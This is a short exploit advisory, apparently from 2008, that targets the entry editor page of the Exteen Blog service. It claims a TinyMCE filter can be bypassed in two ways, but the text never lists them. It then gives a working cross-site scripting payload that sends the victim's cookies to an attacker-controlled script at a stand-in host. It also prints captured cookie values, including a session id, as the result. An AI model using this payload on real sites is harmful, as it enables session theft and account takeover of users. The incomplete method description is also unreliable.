AUTHOR : CWH Underground
DATE : 22 May 2008
SITE : www.citec.us
#####################################################
APPLICATION : Exteen Blog
VENDOR : www.exteen.com
#####################################################
— Vulnerable page —
[-] http://www.exteen.com/manage/entryeditor.php (Create New Entry Page)
— Description —
There are 2 ways to exploit this page
Two methods above will remove tinymce filter after that you can insert any script or HTML tag in your entry :D
— Exploit (Grabbing Cookies)—
Simple Attack: <script>document.location = 'http://yoursite.com/steal.php?cookie=' + document.cookie;</script>
— Note —
This website implement httpOnly that prevent from stealing cookies on ie (>= 6) and firefox (>= 2.0.0.5)
=Result=
IE & Gecko: _uid57334=D8428C8A.2; _cbclose57334=1; _ctout57334=1; VisitOn=54016; VisitorTRUE=11
OPERA & Safari: _cbclose57334=1; _uid57334=16944A6F.1; sid=gdcvv9mab89uf9cmg3hqmhq570;
keyx=NjgdHFErNXpCD1wpVTsYCF0dfx8KBTIDEFM; _ctout57334=1
##################################################################
##################################################################